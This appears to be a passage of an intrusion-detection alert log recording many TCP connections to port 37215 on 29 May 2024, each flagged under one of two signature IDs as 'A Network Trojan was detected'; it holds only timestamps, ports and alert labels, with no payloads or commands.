                Timestamp:05/29/24-15:15:14.231339
                SID:2835222
                Source Port:59754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.378803
                SID:2835222
                Source Port:53086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384444
                SID:2835222
                Source Port:60152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980655
                SID:2829579
                Source Port:59340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.242968
                SID:2829579
                Source Port:54038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861966
                SID:2835222
                Source Port:39842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023264
                SID:2835222
                Source Port:33760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576106
                SID:2829579
                Source Port:43396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786114
                SID:2835222
                Source Port:36176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728594
                SID:2835222
                Source Port:33210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985632
                SID:2835222
                Source Port:53822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.796958
                SID:2829579
                Source Port:51140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804217
                SID:2829579
                Source Port:53168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321245
                SID:2835222
                Source Port:55782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731953
                SID:2829579
                Source Port:47928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913925
                SID:2829579
                Source Port:50732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026650
                SID:2829579
                Source Port:58292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228346
                SID:2835222
                Source Port:35566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842394
                SID:2835222
                Source Port:45770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433818
                SID:2829579
                Source Port:56070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.736983
                SID:2829579
                Source Port:33798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037736
                SID:2829579
                Source Port:36980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840732
                SID:2829579
                Source Port:47290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436353
                SID:2829579
                Source Port:43322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963078
                SID:2829579
                Source Port:35042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514615
                SID:2835222
                Source Port:59930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941588
                SID:2835222
                Source Port:40856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266909
                SID:2835222
                Source Port:40636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818109
                SID:2829579
                Source Port:58340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336664
                SID:2829579
                Source Port:43890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.741712
                SID:2835222
                Source Port:35980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533805
                SID:2835222
                Source Port:41714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871690
                SID:2835222
                Source Port:54684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.797604
                SID:2829579
                Source Port:54402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.844315
                SID:2835222
                Source Port:59954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948847
                SID:2829579
                Source Port:41524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390365
                SID:2829579
                Source Port:36486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586217
                SID:2829579
                Source Port:40146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110688
                SID:2829579
                Source Port:42550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332637
                SID:2829579
                Source Port:51348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928883
                SID:2835222
                Source Port:33308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567250
                SID:2835222
                Source Port:56790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209654
                SID:2835222
                Source Port:35174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.548357
                SID:2829579
                Source Port:46766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.579330
                SID:2829579
                Source Port:37612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797728
                SID:2829579
                Source Port:57398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686775
                SID:2829579
                Source Port:47342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959631
                SID:2835222
                Source Port:33914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784774
                SID:2835222
                Source Port:56700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722792
                SID:2829579
                Source Port:40644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989779
                SID:2829579
                Source Port:55154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.323096
                SID:2829579
                Source Port:57336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287844
                SID:2829579
                Source Port:56072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583471
                SID:2829579
                Source Port:59208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860134
                SID:2829579
                Source Port:60150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184530
                SID:2829579
                Source Port:50712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074479
                SID:2835222
                Source Port:43780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513697
                SID:2829579
                Source Port:48518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.907997
                SID:2835222
                Source Port:49750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557912
                SID:2835222
                Source Port:50268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212190
                SID:2835222
                Source Port:33480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563282
                SID:2829579
                Source Port:49530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630050
                SID:2835222
                Source Port:41748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586945
                SID:2829579
                Source Port:33520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997484
                SID:2829579
                Source Port:33136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419931
                SID:2829579
                Source Port:41692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844789
                SID:2829579
                Source Port:54450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722398
                SID:2829579
                Source Port:58002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.100801
                SID:2835222
                Source Port:45678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269347
                SID:2835222
                Source Port:58522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023479
                SID:2829579
                Source Port:44116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113825
                SID:2829579
                Source Port:51750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667915
                SID:2829579
                Source Port:40980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789364
                SID:2835222
                Source Port:48466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434097
                SID:2829579
                Source Port:40480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228265
                SID:2829579
                Source Port:56678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.413729
                SID:2835222
                Source Port:53914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584344
                SID:2835222
                Source Port:53998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464859
                SID:2835222
                Source Port:60078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782697
                SID:2829579
                Source Port:35728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.803125
                SID:2829579
                Source Port:38554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849041
                SID:2829579
                Source Port:41906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361517
                SID:2835222
                Source Port:44086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266687
                SID:2829579
                Source Port:37326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821167
                SID:2829579
                Source Port:36542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654709
                SID:2835222
                Source Port:58138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615146
                SID:2829579
                Source Port:44918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.605729
                SID:2829579
                Source Port:57896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010770
                SID:2829579
                Source Port:59098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664297
                SID:2835222
                Source Port:37562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958560
                SID:2829579
                Source Port:57330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374014
                SID:2829579
                Source Port:45286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979360
                SID:2835222
                Source Port:37814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325170
                SID:2829579
                Source Port:44464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931485
                SID:2829579
                Source Port:44410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630758
                SID:2835222
                Source Port:34702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560854
                SID:2835222
                Source Port:33382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013468
                SID:2835222
                Source Port:38450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385971
                SID:2835222
                Source Port:59972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015538
                SID:2829579
                Source Port:55900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521832
                SID:2835222
                Source Port:45106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.127959
                SID:2829579
                Source Port:46792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289197
                SID:2835222
                Source Port:46270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977998
                SID:2835222
                Source Port:56044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927822
                SID:2835222
                Source Port:60028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929076
                SID:2835222
                Source Port:36108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970471
                SID:2835222
                Source Port:51584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139869
                SID:2835222
                Source Port:44142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582869
                SID:2829579
                Source Port:46714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228435
                SID:2829579
                Source Port:56568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463000
                SID:2835222
                Source Port:43716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941367
                SID:2829579
                Source Port:55826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231177
                SID:2829579
                Source Port:42994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630671
                SID:2835222
                Source Port:51960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262172
                SID:2829579
                Source Port:35582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833584
                SID:2835222
                Source Port:34868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860381
                SID:2835222
                Source Port:34936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843386
                SID:2835222
                Source Port:52010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918426
                SID:2829579
                Source Port:51826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807425
                SID:2835222
                Source Port:45096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271245
                SID:2829579
                Source Port:39432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318362
                SID:2829579
                Source Port:40550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517956
                SID:2829579
                Source Port:37076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221843
                SID:2829579
                Source Port:44304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732848
                SID:2829579
                Source Port:36918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811074
                SID:2829579
                Source Port:56812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981953
                SID:2829579
                Source Port:51764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265728
                SID:2829579
                Source Port:50598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783183
                SID:2835222
                Source Port:39388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593739
                SID:2829579
                Source Port:52326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163309
                SID:2835222
                Source Port:54068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665168
                SID:2829579
                Source Port:53900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868543
                SID:2829579
                Source Port:45618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573817
                SID:2835222
                Source Port:34398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441612
                SID:2829579
                Source Port:50190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284238
                SID:2829579
                Source Port:42972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714585
                SID:2835222
                Source Port:56018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826779
                SID:2829579
                Source Port:55080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463537
                SID:2829579
                Source Port:52574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282422
                SID:2835222
                Source Port:47306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853109
                SID:2835222
                Source Port:40728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.911210
                SID:2829579
                Source Port:47614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620262
                SID:2829579
                Source Port:47230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560913
                SID:2829579
                Source Port:40128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612552
                SID:2829579
                Source Port:54088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460480
                SID:2829579
                Source Port:46990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560082
                SID:2829579
                Source Port:56960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685743
                SID:2835222
                Source Port:39680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.973762
                SID:2829579
                Source Port:56660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290347
                SID:2829579
                Source Port:35278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718402
                SID:2835222
                Source Port:56072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653034
                SID:2829579
                Source Port:46068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887886
                SID:2829579
                Source Port:55814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.895988
                SID:2835222
                Source Port:38268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315879
                SID:2835222
                Source Port:44134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665252
                SID:2835222
                Source Port:56044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520545
                SID:2835222
                Source Port:40774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915333
                SID:2829579
                Source Port:42158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.544438
                SID:2829579
                Source Port:53054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586110
                SID:2835222
                Source Port:48994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826361
                SID:2835222
                Source Port:37030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916080
                SID:2835222
                Source Port:51152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.812947
                SID:2829579
                Source Port:45822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037700
                SID:2835222
                Source Port:37914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639699
                SID:2835222
                Source Port:60792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111809
                SID:2835222
                Source Port:55918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982210
                SID:2829579
                Source Port:43138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360434
                SID:2835222
                Source Port:58238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567385
                SID:2829579
                Source Port:50472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715320
                SID:2829579
                Source Port:53964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841776
                SID:2829579
                Source Port:53820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172916
                SID:2835222
                Source Port:34036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897643
                SID:2829579
                Source Port:41796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141509
                SID:2829579
                Source Port:51928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281426
                SID:2829579
                Source Port:36576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561712
                SID:2835222
                Source Port:40174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864497
                SID:2835222
                Source Port:59954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284315
                SID:2829579
                Source Port:34234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869389
                SID:2835222
                Source Port:44130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028008
                SID:2829579
                Source Port:44494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384370
                SID:2835222
                Source Port:43496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979327
                SID:2835222
                Source Port:56544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.272036
                SID:2829579
                Source Port:58212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989117
                SID:2829579
                Source Port:41170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231008
                SID:2835222
                Source Port:43690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555708
                SID:2829579
                Source Port:47074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.934933
                SID:2829579
                Source Port:39610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986696
                SID:2829579
                Source Port:33552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908269
                SID:2829579
                Source Port:37142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855931
                SID:2835222
                Source Port:44696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384498
                SID:2829579
                Source Port:34532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.395194
                SID:2835222
                Source Port:37144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189852
                SID:2829579
                Source Port:35884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466557
                SID:2835222
                Source Port:38092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360614
                SID:2829579
                Source Port:37042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223756
                SID:2835222
                Source Port:34724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361751
                SID:2835222
                Source Port:50400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164721
